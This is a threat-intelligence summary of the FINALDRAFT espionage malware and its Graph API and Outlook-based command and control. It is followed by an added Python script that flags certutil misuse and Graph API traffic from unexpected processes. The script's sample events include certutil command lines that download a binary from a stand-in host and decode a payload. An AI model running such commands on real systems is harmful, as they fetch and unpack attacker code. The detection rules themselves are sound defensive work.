Elastic Security Labs uncovered FINALDRAFT, a malware family that uses Microsoft's Graph API for data exfiltration and performs process injection, tied to a suspected Chinese espionage campaign. Initially targeting the foreign ministry of a South American country, along with a telecommunications firm and a university in Southeast Asia, the campaign showcases intricate malware behavior such as C2 via Outlook. Despite its advanced nature, researchers noted operational inconsistencies, suggesting that the attackers may lack extensive experience despite an effective organizational structure. The infection chain leverages tools such as certutil and relies on in-memory injection to evade detection, reflecting evolving cyber-attack methodologies.
The FINALDRAFT malware utilizes Microsoft's Graph API to exfiltrate data and perform process injection, indicating a sophisticated espionage campaign possibly linked to China.
Elastic Security Labs discovered FINALDRAFT during an investigation, revealing its extensive functionality—operating via Outlook for command-and-control communications.
While the malware demonstrates high sophistication, inconsistencies in its evasion techniques hint at a less experienced, though well-organized, attacker group.
The FINALDRAFT malware targets key institutions, including a foreign ministry and a university, showcasing a trend in cyber espionage against strategic sectors.
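Two of the behaviors summarized above (certutil used as a downloader or decoder early in the infection chain, and Graph API traffic to graph.microsoft.com originating from a process that should not be a Graph client) are generic enough to turn into detection logic. The script below is an added example written for this summary; it is not code from Elastic Security Labs or from the FINALDRAFT report. The log lines are constructed for the example, the key=value event format and field names (type, image, parent, cmdline, dest) are assumed, and the allowlist of expected Graph API clients is a placeholder that a real deployment would tune to its own environment.

```python
"""Added example: simple detection rules for certutil misuse and unexpected
Graph API clients, run over constructed key=value log events."""
import re

# Constructed sample telemetry (not from the report). Each line is one event.
SAMPLE_EVENTS = [
    'type=process parent=cmd.exe image=certutil.exe '
    'cmdline="certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin"',
    'type=process parent=explorer.exe image=certutil.exe '
    'cmdline="certutil.exe -hashfile C:\\file.txt SHA256"',
    'type=process parent=cmd.exe image=certutil.exe '
    'cmdline="certutil.exe -decode payload.txt payload.exe"',
    'type=network image=outlook.exe dest=graph.microsoft.com port=443',
    'type=network image=notepad.exe dest=graph.microsoft.com port=443',
]

# key=value pairs; values may be double-quoted (to allow spaces) or bare.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# certutil switches that fetch or transform content rather than inspect certs.
# These are real certutil switches; -hashfile is deliberately not listed.
CERTUTIL_SUSPICIOUS = re.compile(r"(?i)-(urlcache|decode|encode)\b")

GRAPH_HOSTS = {"graph.microsoft.com"}
# Assumed allowlist: processes expected to talk to Graph in this environment.
EXPECTED_GRAPH_CLIENTS = {"outlook.exe", "teams.exe", "onedrive.exe"}


def parse_event(line: str) -> dict:
    """Turn one key=value log line into a dict; quoted values keep spaces."""
    return {k: (q or u) for k, q, u in FIELD_RE.findall(line)}


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches (empty if none)."""
    hits = []
    image = event.get("image", "").lower()
    if event.get("type") == "process" and image == "certutil.exe":
        if CERTUTIL_SUSPICIOUS.search(event.get("cmdline", "")):
            hits.append("certutil_download_or_decode")
    if event.get("type") == "network" and event.get("dest", "").lower() in GRAPH_HOSTS:
        if image not in EXPECTED_GRAPH_CLIENTS:
            hits.append("graph_api_from_unexpected_process")
    return hits


def scan(lines) -> list:
    """Evaluate every line; return (line_index, rule_name) pairs for matches."""
    return [
        (i, rule)
        for i, line in enumerate(lines)
        for rule in evaluate(parse_event(line))
    ]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The certutil rule keys on the switch, not on any URL or file name, so it survives infrastructure changes; the Graph rule is an allowlist rather than a blocklist because the endpoint itself is legitimate and the anomaly is the client. With injection into a trusted process, the second rule would miss a beacon sent from an allowlisted image, which is why it should be paired with process-injection telemetry rather than used alone.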